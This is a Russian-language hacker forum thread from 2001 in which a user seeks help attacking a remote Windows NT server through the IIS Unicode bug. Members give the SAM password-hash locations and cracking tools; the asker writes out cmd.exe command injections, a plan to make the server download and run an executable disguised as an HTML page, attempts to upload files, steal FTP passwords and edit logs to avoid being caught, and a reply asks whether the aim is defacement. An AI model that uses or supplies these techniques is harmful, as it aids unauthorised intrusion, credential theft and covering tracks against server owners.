Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Хай ол! 26.05.01 00:56
Автор: Alёkz Статус: Незарегистрированный пользователь
|
Где WINNT хранит системные пароли? и чем их расшифровывать мона?
Сэнкс ол!
|
|
Хай ол! 26.05.01 01:57
Автор: NiFi... <NiFiGaSebe!> Статус: Member
|
> Где WINNT хранит системные пароли? и чем их расшифровывать
> мона?
> Сэнкс ол!
Q: Где лежат пароли в НТ? Как их вытащить?
A: Хэши паролей лежат в %windir%\repair\sam и %windir%\system32\config\sam,
их нужно скопировать и вытащить из них пароли с помощью программы:
LCP (http://lcp.chat.ru) или
L0phtcrack (http://www.l0phtcrack.com)
Подробная документация на эту тему здесь:
http://www.osp.ru/win2000/1999/02/09.htm
Также мы собрали небольшой FAQ по взлому NT, основанный на сообщениях в
HackZone форуме, лежит здесь. Если этого недостаточно, то зайти вот
сюда и ввести "sam".
Полный FAQ и многое другое можно увидеть здесь:
http://www.uinc.ru/
|
| |
Хай ол! 26.05.01 11:31
Автор: Alёkz Статус: Незарегистрированный пользователь
|
Биг спешиал сэнкс тебе мэн!!!
Можешь 1 мор тайм подсказать плизззз? - ну вот типа cmd.exe/c+dir да? а вот что оно тебе говорит если типа cmd.exe/c+echo+ohverycool+>+z.cgi? error 500? мне да :( я так понял ему надо типа чтоб обратно что то шло как например просто echo+cool да?
и cmd.exe с правами рута получаеться? вобшем на диск нечё записать не могу :( дошол до такого изврата (непроверил пока) типа несколько раз cmd.exe/c+iexplorer.exe http://www.lomka.net/cooler.html чтоб он эту cooler.html закешировал, а это не html а exe :) а потом запусттить :) как идея? окно браузера откроеться на монитор сисопу? думал ё-мыло прислать - так оно заголовки добавляет нехорошие :(
вобшем как записать в файл когда просто echo a > b не работает? в лине ; поставил и новая команда а в досе нет :(
хотел даже типа perl -e $file -e = -e chr(62).chr(62). -e 'cool' -e open -e (FILE, -e $file); -e print -e FILE -e 'ТyТa БbiЛо В4Сё ПyПкb|0'; -e close -e (FILE);
дома работает а на серваке sucks :(((((((((((((( та и ваше там всё sucks :)
можа есть ешё какойта (станадртый) прог (в систем) через который бы запихнуть файло на сервак через cmd.exe?
вобшем проблема в том чтоб через cmd.exe чёнит на сервак записать - если тамашний софт нечё обратно юзеру не шлёт то он 500 error даёт :(((
вобшем можна без особого софта выдрать пароли с winnt через cmd.exe??? а то на многие файлы пишет типа ин юз он шас :( пароли хотяб на ftp - я там зайду чё угодно за апложу... а ешё основные логи можно из консоли редактить? а то както почемуто жить хочеться... =:-)
Эген - сэнкс большой за внимание всем!!!
|
| | |
Хай ол! 26.05.01 12:06
Автор: NiFi... <NiFiGaSebe!> Статус: Member
|
|
Захера тебе удаленные пароли?....все равно ты с ними ничего не сможешь сделать...
|
| | | |
Хай ол! 26.05.01 12:59
Автор: Alёkz Статус: Незарегистрированный пользователь
|
> Захера тебе удаленные пароли?....все равно ты с ними ничего
> не сможешь сделать...
Да мне пароли пофиг наифиг не нуна - нуна файло писать туда на сервак через cmd.exe а echo cool > looc.cgi не работает - error 500. но echo cool работает.
я тока думал взять пароль к ftp...
|
| | | | |
Определи конкретно что ты хочешь? 26.05.01 13:27
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
|
начал ты с паролей НТ, перешел на юникод баг и невозможность записи, потом пароль от фТП.... Скажи что является твоей конечной целью? Дефейс? пароль от ФТП?
|
| | | | | |
Определяю 27.05.01 01:24
Автор: Alёkz Статус: Незарегистрированный пользователь
|
> начал ты с паролей НТ, перешел на юникод баг и
> невозможность записи, потом пароль от фТП.... Скажи что
> является твоей конечной целью? Дефейс? пароль от ФТП?
Есть сервак на просторах инэта.
И юникод баг на серваке том тоже есть.
Этот баг (cmd.exe) к ДОС командной строке доступ с правами рута даёт, да?
Могу я команды разные выполнять - но так что они что то обратно давали - dir даёт список диров, copy сколько файлов копид. echo cool обратно cool пишет но echo cool > cool.cgi это дело в файл cool.cgi пишет и обратно ничего не шлёт. Поэтому сервак говорит error 500, и никакого файла на сервак не пишет. Тоесть могу смотреть что на серваке но записать ничего не могу :(
Поэтому я подумал посмотреть пароли к ftp а потом уже что угодно зааплодить. Но где они и как незнаю. Ешё на том серваке есть telnet.
На Linux echo cool > cool.cgi; echo cool сделает файл cool.cgi с содержанием cool и выдаст на экран cool. В Досе echo cool > cool.cgi; echo cool сделает файл cool.cgi с содержанием cool; echo cool и нечего назад не выдадет, а сервак выдаст 500 без записи в файл :(
-=[ Короче проблема в том чтоб что то зааплодить на сервак с юникод багом. ]=-
Может есть какойнить другой баг для аплода?
Пытался перлу передать команды скрипта с командной строки (это возможно) чтоб он записал в файл и назад на экран чёнить черкнул - дома работает, на серваке нет :-(
Есьно cmd.exe?/c+ftp не поможет - можно передать в командной строке к какому серваку конэктится но чточтоб он взял конкретный файл - нет. К томуже он ничего обратно не шлёт.
--<( Проблема в том чтоб что то зааплодить на сервак с юникод багом. )>--
Сэнкс ол!
|
| | | | | | |
A: 27.05.01 02:48
Автор: IronHawk! Статус: Незарегистрированный пользователь
|
> --<( Проблема в том чтоб что то зааплодить на сервак с
> юникод багом. )>--
> Сэнкс ол!
а чё, обязательно через cmd по другому низя?
там что остальные баги закрыты для аплода ? , или сисамин умный но не ластовый ?
а пароли с НТ снимаються или PWL или PWD ридером !
|
| | | | | | | |
A: 27.05.01 08:59
Автор: Alёkz Статус: Незарегистрированный пользователь
|
> а чё, обязательно через cmd по другому низя?
не - по другому незя :-(
|
|
|
подробно о проекте
Анализ криптографических сетевых...
